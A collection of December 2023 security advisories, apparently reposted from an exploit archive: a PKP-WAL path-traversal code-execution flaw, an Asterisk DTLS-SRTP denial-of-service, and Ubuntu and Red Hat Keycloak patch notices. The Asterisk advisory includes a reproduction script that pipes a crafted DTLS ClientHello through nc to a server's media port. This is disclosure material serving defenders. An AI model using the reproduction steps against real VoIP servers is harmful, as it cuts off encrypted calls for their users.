PKP Web Application Library (PKP-WAL) versions 3.4.0-3 and below, as used in Open Journal Systems (OJS), Open Monograph Press (OMP), and Open Preprint Systems (OPS) before versions 3.4.0-4 or 3.3.0-16, suffer from a NativeImportExportPlugin related remote code execution vulnerability.

    ---------------------------------------------------------------------------------PKP-WAL <= 3.4.0-3 (NativeImportExportPlugin) Remote Code ExecutionVulnerability---------------------------------------------------------------------------------[-] Software Links:https://pkp.sfu.cahttps://github.com/pkp/pkp-lib[-] Affected Versions:PKP Web Application Library (aka PKP-WAL or pkp-lib) version 3.4.0-3and prior versions, as used in Open Journal Systems (OJS), OpenMonograph Press (OMP), and Open Preprint Systems (OPS) before versions3.4.0-4 or 3.3.0-16.[-] Vulnerabilities Description:The vulnerability is located in the/plugins/importexport/native/filter/PKPNativeFilterHelper.php script.Specifically, into the"PKPNativeFilterHelper::parsePublicationCover()" method:100.     public function parsePublicationCover($filter, $node, $object)101.     {102.         $deployment = $filter->getDeployment();103.104.         $context = $deployment->getContext();105.106.         $locale = $node->getAttribute('locale');107.         if (empty($locale)) {108.             $locale = $context->getPrimaryLocale();109.         }110.111.         $coverImagelocale = [];112.         $coverImage = [];113.114.         for ($n = $node->firstChild; $n !== null; $n = $n->nextSibling) {115.             if ($n instanceof DOMElement) {116.                 switch ($n->tagName) {117.                     case 'cover_image':118.                         $coverImage['uploadName'] = $n->textContent;119.                         break;120.                     case 'cover_image_alt_text':121.                         $coverImage['altText'] = $n->textContent;122.                         break;123.                     case 'embed':124.                         $publicFileManager = new PublicFileManager();125.                         $filePath =$publicFileManager->getContextFilesPath($context->getId()) . '/' .$coverImage['uploadName'];126.                         file_put_contents($filePath,base64_decode($n->textContent));127.                         break;User input passed through the cover image tags of the import XML fileis not properly sanitized before being used at line 118 to construct avariable, which is later used as the final part of the filepath usedin a call to the file_put_contents() PHP function at line 126. Thiscan be exploited to write/overwrite arbitrary files on the web servervia Path Traversal sequences, leading to execution of arbitrary PHPcode.Successful exploitation of this vulnerability requires an account withpermissions to access the "Import/Export" plugin, such as a JournalEditor or Production Editor user.[-] Solution:Upgrade to version 3.4.0-4 or later.[-] Disclosure Timeline:[14/10/2023] - Vendor notified[26/10/2023] - Vendor fixed the issue and opened a public GitHubissue: https://github.com/pkp/pkp-lib/issues/9464[05/11/2023] - CVE identifier assigned[17/11/2023] - Version 3.4.0-4 released[14/12/2023] - Publication of this advisory[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the name CVE-2023-47271 to this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Original Advisory:http://karmainsecurity.com/KIS-2023-14

PKP-WAL 3.4.0-3 Remote Code Execution

When handling DTLS-SRTP for media setup, Asterisk version 20.1.0 is susceptible to denial of service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack.

# Asterisk susceptible to Denial of Service via DTLS Hello packets during call initiation

- Fixed versions: 18.20.1, 20.5.1, 21.0.1,18.9-cert6  
- Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race  
- Vendor Security Advisory: https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq  
- Other references: CVE-2023-49786  
- Tested vulnerable versions: 20.1.0  
- Timeline:  
  - Report date: 2023-09-27  
  - Triaged: 2023-09-27  
  - Fix provided for testing: 2023-11-09  
  - Vendor release with fix: 2023-12-14  
  - Enable Security advisory: 2023-12-15

## TL;DR

When handling DTLS-SRTP for media setup, Asterisk is susceptible to Denial of Service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack.

## Description

Our research has shown that key establishment for Secure Real-time Transport Protocol (SRTP) using Datagram Transport Layer Security Extension (DTLS)[^1] is susceptible to a Denial of Service attack due to a race condition. If an attacker manages to send a ClientHello DTLS message with an invalid CipherSuite (such as `TLS_NULL_WITH_NULL_NULL`) to the port on the Asterisk server that is expecting packets from the caller, a DTLS error is generated. This results in the media session being torn down, which is followed by teardown at signaling (SIP) level too.

This behavior was tested against Asterisk version 20.1.0, which was found to be vulnerable to this issue.

The following sequence diagram shows the normal flow (i.e. no attack) involving SIP, STUN and DTLS messages between a UAC (the Caller) and an Asterisk server capable of handling WebRTC calls.

Diagram showing a call setup against Asterisk that uses SIP, STUN and DTLS: https://github.com/EnableSecurity/advisories/blob/master/ES2023-01-asterisk-dtls-hello-race/resources/valid.png

In a controlled experiment, it was observed that when the Attacker sent a DTLS ClientHello to Asterisk's media port from a different IP and port, Asterisk responded by sending a DTLS Alert to the Caller. Additionally, Asterisk terminated the SIP call by sending a BYE message to the Caller.

Diagram showing a call setup against Asterisk that fails due to an attacker controlled DTLS ClientHello:  
https://github.com/EnableSecurity/advisories/blob/master/ES2023-01-asterisk-dtls-hello-race/resources/dos.png

During a real attack, the attacker would spray a vulnerable Asterisk server with DTLS ClientHello messages. The attacker would typically target the range of UDP ports allocated for RTP. When the ClientHello message from the Attacker wins the race against an expected ClientHello from the Caller, the call terminates, resulting in Denial of Service.

## Impact

Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP.

## How to reproduce the issue

1. Prepare an Asterisk server with an extension configured to handle WebRTC; this may involve the following `pjsip.conf` and `extensions.conf` configuration updates:

    `pjsip.conf`  
    ```ini  
  [transport-tls-nat]  
  type = transport  
  protocol = wss  
  bind = 172.17.0.2

  [webrtc_client]  
  type=aor  
  max_contacts=5  
  remove_existing=yes

  [webrtc_client]  
  type=auth  
  auth_type=userpass  
  username=3456  
  password=3456

  [3456]  
  type=endpoint  
  aors=webrtc_client  
  auth=webrtc_client  
  dtls_auto_generate_cert=yes  
  webrtc=yes  
  context=default  
  disallow=all  
  allow=opus,ulaw  
  ```

  `extensions.conf`  
  ```ini  
  [globals]

  [default]  
  exten = _XXXX,1,Verbose(1, "User ${CALLERID(num)} dialed ${EXTEN}.")  
    same => n,Playback(demo-congrats)  
    same => n,Hangup()  
  ```  
1. Send an INVITE message to the target server with WebRTC SDP:

    ```default  
  INVITE sip:1000@192.168.1.202 SIP/2.0  
  Via: SIP/2.0/WSS 192.168.1.202:36742;rport=36742;branch=z9hG4bK-4RHtimOzaIkHeUDU  
  Max-Forwards: 70  
  From: <sip:3456@192.168.1.202>;tag=cnbsc3nNX2ydugl4  
  To: <sip:1000@192.168.1.202>  
  Contact: <sip:3456@192.168.1.202>  
  Call-ID: VaglTzNRBSuvPPdw  
  CSeq: 5 INVITE  
  Content-Type: application/sdp  
  Content-Length: 563

  v=0  
  o=- 1695296401 1695296401 IN IP4 192.168.1.202  
  s=-  
  t=0 0  
  c=IN IP4 192.168.1.202  
  m=audio 36866 UDP/TLS/RTP/SAVPF 0 8 101  
  a=setup:active  
  a=fingerprint:sha-256 49:05:98:B2:15:43:1C:9C:4F:29:07:60:F8:63:77:16:80:F9:44:C0:97:8E:E5:48:D6:71:B4:03:10:85:D6:E3  
  a=rtpmap:0 PCMU/8000/1  
  a=rtpmap:8 PCMA/8000/1  
  a=rtpmap:101 telephone-event/8000  
  a=ice-ufrag:IOZyOSQkVywevryI  
  a=ice-pwd:UQUtRMZKFERnmZqQdaggFzJBhcWVxabr  
  a=candidate:6249488300 1 udp 2130706431 192.168.1.202 36866 typ host generation 0  
  a=end-of-candidates  
  a=rtcp-mux  
  a=rtcprsize  
  a=sendrecv

  ```  
1. Note Asterisk's media port and IP values, which will be used as the `<asterisk-ip>` and `<media-port>` parameters by the Attacker  
1. When the call has been established, send a STUN binding request which has the appropriate Username, Message-Integrity and  Ice-Controlled properties  
1. When the Binding Success Response message is received, send a DTLS ClientHello message from a (attacker-controlled) host, which is different from the Caller but has network access to the Asterisk server

    ```bash  
  CLIENT_HELLO="Fv7/AAAAAAAAAAAAfAEAAHAAAAAAAAAAcP79AAA"   
  CLIENT_HELLO="${CLIENT_HELLO}AAG4HCVaUNVbYVmxuqdn2WyCgtTijhZ+WheP/+H"  
  CLIENT_HELLO="${CLIENT_HELLO}4AAAACAAABAABEABcAAP8BAAEAAAoACAAGAB0AF"  
  CLIENT_HELLO="${CLIENT_HELLO}wAYAAsAAgEAACMAAAANABQAEgQDCAQEAQUDCAUF"  
  CLIENT_HELLO="${CLIENT_HELLO}AQgGBgECAQAOAAkABgABAAgABwA="  
  echo -n "${CLIENT_HELLO}" | base64 --decode | nc -u <asterisk-ip> <media-port>  
  ```  
1. Observe that the Caller receives a DTLS Alert message and a SIP BYE message on its signaling channel

Note that the above steps are used to reliably reproduce the vulnerability. In the case of a real attack, the attacker simply has to spray the Asterisk server with DTLS messages.

## Solution and recommendations

To address this vulnerability, upgrade Asterisk to the latest version which includes the security fix. The solution implemented is to drop all packets from addresses that have not been validated by an ICE check.

## About Enable Security

[Enable Security](https://www.enablesecurity.com) develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack.

## Disclaimer

The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

## Disclosure policy

This report is subject to Enable Security's vulnerability disclosure policy which can be found at <https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy>.

[^1]: Datagram Transport Layer Security (DTLS) Extension to Establish Keys for the Secure Real-time Transport Protocol (SRTP) https://datatracker.ietf.org/doc/html/rfc5764

--

     Sandro Gauci, CEO at Enable Security GmbH

    Register of Companies:       AG Charlottenburg HRB 173016 B  
    Company HQ:                       Neuburger Straße 101 b, 94036 Passau, Germany  
    RTCSec Newsletter:               https://www.rtcsec.com/subscribe  
    Our blog:                                https://www.rtcsec.com  
    Other points of contact:       https://www.enablesecurity.com/contact/

Asterisk 20.1.0 Denial Of Service

Ubuntu Security Notice 6233-2 - USN-6233-1 fixed vulnerabilities in YAJL. This update provides the corresponding updates for Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 23.04. It was discovered that YAJL was not properly performing bounds checks when decoding a string with escape sequences. If a user or automated system using YAJL were tricked into processing specially crafted input, an attacker could possibly use this issue to cause a denial of service .

==========================================================================  
Ubuntu Security Notice USN-6233-2  
December 14, 2023

yajl vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in YAJL.

Software Description:  
- yajl: Yet Another JSON Library

Details:

USN-6233-1 fixed vulnerabilities in YAJL. This update provides the  
corresponding updates for Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu  
23.04.

Original advisory details:

  It was discovered that YAJL was not properly performing bounds checks when  
  decoding a string with escape sequences. If a user or automated system  
  using YAJL were tricked into processing specially crafted input, an  
  attacker could possibly use this issue to cause a denial of service  
  (application abort). (CVE-2017-16516)

  It was discovered that YAJL was not properly handling memory allocation  
  when dealing with large inputs, which could lead to heap memory  
  corruption. If a user or automated system using YAJL were tricked into  
  running a specially crafted large input, an attacker could possibly use  
  this issue to cause a denial of service. (CVE-2022-24795)

  It was discovered that memory leaks existed in one of the YAJL parsing  
  functions. An attacker could possibly use this issue to cause a denial of  
  service (memory exhaustion). (CVE-2023-33460)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   libyajl2                        2.1.0-3ubuntu0.23.04.1

Ubuntu 22.04 LTS:  
   libyajl2                        2.1.0-3ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
   libyajl2                        2.1.0-3ubuntu0.20.04.1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6233-2  
   https://ubuntu.com/security/notices/USN-6233-1  
   CVE-2017-16516, CVE-2022-24795, CVE-2023-33460

Package Information:  
   https://launchpad.net/ubuntu/+source/yajl/2.1.0-3ubuntu0.23.04.1  
   https://launchpad.net/ubuntu/+source/yajl/2.1.0-3ubuntu0.22.04.1  
   https://launchpad.net/ubuntu/+source/yajl/2.1.0-3ubuntu0.20.04.1

Ubuntu Security Notice USN-6233-2

Red Hat Security Advisory 2023-7861-03 - A security update is now available for Red Hat build of Keycloak 22.0.7 images running on OpenShift Container Platform. Issues addressed include bypass and cross site scripting vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7861.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat build of Keycloak 22.0.7 images enhancement and security updateAdvisory ID:        RHSA-2023:7861-03Product:            Red Hat build of KeycloakAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7861Issue date:         2023-12-14Revision:           03CVE Names:          CVE-2023-6134====================================================================Summary: A security update is now available for Red Hat build of Keycloak 22.0.7 images running on OpenShift Container Platform.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat build of Keycloak 22.0.7 is an integrated solution, available as a Red Hat JBoss Middleware for OpenShift containerized image, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications.This erratum releases a security update and enhancement images for Red Hat build of Keycloak 22.0.7 for use within the OpenShift Container Platform 4.12, 4.13 and 4.14 cloud computing Platform-as-a-Service (PaaS) for on-premise or private cloud deployments, aligning with the standalone product release.Security Fix(es):* reflected XSS via wildcard in OIDC redirect_uri (CVE-2023-6291)* redirect_uri validation logic that allows for a bypass of otherwise explicitly allowed hosts (CVE-2023-6134)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6134References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2249673https://bugzilla.redhat.com/show_bug.cgi?id=2251407

Red Hat Security Advisory 2023-7861-03

Red Hat Security Advisory 2023-7860-03 - Red Hat build of Keycloak 22.0.7 is now available from the Customer Portal. Issues addressed include bypass and cross site scripting vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7860.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat build of Keycloak 22.0.7 enhancement and security updateAdvisory ID:        RHSA-2023:7860-03Product:            Red Hat build of KeycloakAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7860Issue date:         2023-12-14Revision:           03CVE Names:          CVE-2023-6134====================================================================Summary: Red Hat build of Keycloak 22.0.7 is now available from the Customer Portal.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat build of Keycloak 22.0.7 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications.This release of Red Hat build of Keycloak 22.0.7 serves as a replacement for Red Hat build of Keycloak 22.0.6, and includes bug fixes, enhancements and security fixes, which are documented in the Release Notes document linked to in the References.Security Fix(es):* redirect_uri validation logic that allows for a bypass of otherwise explicitly allowed hosts (CVE-2023-6134)* reflected XSS via wildcard in OIDC redirect_uri (CVE-2023-6291)For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/documentation/en-us/red_hat_build_of_keycloak/22.0/html-single/migration_guide/CVEs:CVE-2023-6134References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=rhbk&downloadType=distributions&version=22.0.7https://bugzilla.redhat.com/show_bug.cgi?id=2249673https://bugzilla.redhat.com/show_bug.cgi?id=2251407

Red Hat Security Advisory 2023-7860-03

Red Hat Security Advisory 2023-7858-03 - A security update is now available for Red Hat Single Sign-On 7.6 from the Customer Portal. Issues addressed include bypass, cross site scripting, and denial of service vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7858.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat Single Sign-On 7.6.6 security updateAdvisory ID:        RHSA-2023:7858-03Product:            Red Hat Single Sign-OnAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7858Issue date:         2023-12-14Revision:           03CVE Names:          CVE-2023-6134====================================================================Summary: A security update is now available for Red Hat Single Sign-On 7.6 from the Customer Portal.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications.This release of Red Hat Single Sign-On 7.6.6 serves as a replacement for Red Hat Single Sign-On 7.6.5, and includes bug fixes and enhancements.Security Fix(es):* keycloak: redirect_uri validation logic that allows for a bypass of otherwise explicitly allowed hosts (CVE-2023-6134)* keycloak: reflected XSS via wildcard in OIDC redirect_uri (CVE-2023-6291)* keycloak: offline session token DoS (CVE-2023-6563)For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:CVE-2023-6134References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=core.service.rhsso&downloadType=patches&version=7.6https://bugzilla.redhat.com/show_bug.cgi?id=2249673https://bugzilla.redhat.com/show_bug.cgi?id=2251407https://bugzilla.redhat.com/show_bug.cgi?id=2253308

Red Hat Security Advisory 2023-7858-03

Red Hat Security Advisory 2023-7857-03 - A new image is available for Red Hat Single Sign-On 7.6.6, running on OpenShift Container Platform 3.10 and 3.11, and 4.3. Issues addressed include bypass, cross site scripting, and denial of service vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7857.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat Single Sign-On 7.6.6 for OpenShift image enhancement and security updateAdvisory ID:        RHSA-2023:7857-03Product:            Red Hat OpenShift EnterpriseAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7857Issue date:         2023-12-14Revision:           03CVE Names:          CVE-2023-6134====================================================================Summary: A new image is available for Red Hat Single Sign-On 7.6.6, running on OpenShift Container Platform 3.10 and 3.11, and 4.3.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Single Sign-On is an integrated sign-on solution, available as a Red Hat JBoss Middleware for OpenShift containerized image. The Red Hat Single Sign-On for OpenShift image provides an authentication server that you can use to log in centrally, log out, and register. You can also manage user accounts for web applications, mobile applications, and RESTful web services.This erratum releases a new image for Red Hat Single Sign-On 7.6.6 for use within the OpenShift Container Platform 3.10, OpenShift Container Platform 3.11, and OpenShift Container Platform 4.3 cloud computing Platform-as-a-Service (PaaS) for on-premise or private cloud deployments, aligning with the standalone product release.Security Fix(es):* keycloak: redirect_uri validation logic that allows for a bypass of otherwise explicitly allowed hosts (CVE-2023-6134)* keycloak: reflected XSS via wildcard in OIDC redirect_uri (CVE-2023-6291)* keycloak: offline session token DoS (CVE-2023-6563)For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://raw.githubusercontent.com/jboss-container-images/redhat-sso-7-openshift-image/v7.6.6.GA/templates/${resource}CVEs:CVE-2023-6134References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2249673https://bugzilla.redhat.com/show_bug.cgi?id=2251407https://bugzilla.redhat.com/show_bug.cgi?id=2253308

Red Hat Security Advisory 2023-7857-03

Red Hat Security Advisory 2023-7856-03 - New Red Hat Single Sign-On 7.6.6 packages are now available for Red Hat Enterprise Linux 8. Issues addressed include bypass, cross site scripting, and denial of service vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7856.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat Single Sign-On 7.6.6 security update on RHEL 8Advisory ID:        RHSA-2023:7856-03Product:            Red Hat Single Sign-OnAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7856Issue date:         2023-12-14Revision:           03CVE Names:          CVE-2023-6134====================================================================Summary: New Red Hat Single Sign-On 7.6.6 packages are now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications.This release of Red Hat Single Sign-On 7.6.6 on RHEL 8 serves as a replacement for Red Hat Single Sign-On 7.6.5, and includes bug fixes and enhancements.Security Fix(es):* keycloak: reflected XSS via wildcard in OIDC redirect_uri (CVE-2023-6291)* keycloak: redirect_uri validation logic that allows for a bypass of otherwise explicitly allowed hosts (CVE-2023-6134)* keycloak: offline session token DoS (CVE-2023-6563)For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6134References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2249673https://bugzilla.redhat.com/show_bug.cgi?id=2251407https://bugzilla.redhat.com/show_bug.cgi?id=2253308

Red Hat Security Advisory 2023-7856-03

Red Hat Security Advisory 2023-7855-03 - New Red Hat Single Sign-On 7.6.6 packages are now available for Red Hat Enterprise Linux 9. Issues addressed include bypass, cross site scripting, and denial of service vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7855.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat Single Sign-On 7.6.6 security update on RHEL 9Advisory ID:        RHSA-2023:7855-03Product:            Red Hat Single Sign-OnAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7855Issue date:         2023-12-14Revision:           03CVE Names:          CVE-2023-6134====================================================================Summary: New Red Hat Single Sign-On 7.6.6 packages are now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications.This release of Red Hat Single Sign-On 7.6.6 on RHEL 9 serves as a replacement for Red Hat Single Sign-On 7.6.5, and includes bug fixes and enhancements.Security Fix(es):* keycloak: redirect_uri validation logic that allows for a bypass of otherwise explicitly allowed hosts (CVE-2023-6134)* keycloak: reflected XSS via wildcard in OIDC redirect_uri (CVE-2023-6291)* keycloak: offline session token DoS (CVE-2023-6563)For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6134References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2249673https://bugzilla.redhat.com/show_bug.cgi?id=2251407https://bugzilla.redhat.com/show_bug.cgi?id=2253308

Red Hat Security Advisory 2023-7855-03

Red Hat Security Advisory 2023-7854-03 - New Red Hat Single Sign-On 7.6.6 packages are now available for Red Hat Enterprise Linux 7. Issues addressed include bypass, cross site scripting, and denial of service vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7854.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat Single Sign-On 7.6.6 security update on RHEL 7Advisory ID:        RHSA-2023:7854-03Product:            Red Hat Single Sign-OnAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7854Issue date:         2023-12-14Revision:           03CVE Names:          CVE-2023-6134====================================================================Summary: New Red Hat Single Sign-On 7.6.6 packages are now available for Red Hat Enterprise Linux 7.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications.This release of Red Hat Single Sign-On 7.6.6 on RHEL 7 serves as a replacement for Red Hat Single Sign-On 7.6.5, and includes bug fixes and enhancements.Security Fix(es):* keycloak: reflected XSS via wildcard in OIDC redirect_uri (CVE-2023-6291)* keycloak: redirect_uri validation logic that allows for a bypass of otherwise explicitly allowed hosts (CVE-2023-6134)* keycloak: offline session token DoS (CVE-2023-6563)For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6134References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2249673https://bugzilla.redhat.com/show_bug.cgi?id=2251407https://bugzilla.redhat.com/show_bug.cgi?id=2253308

Tag

#js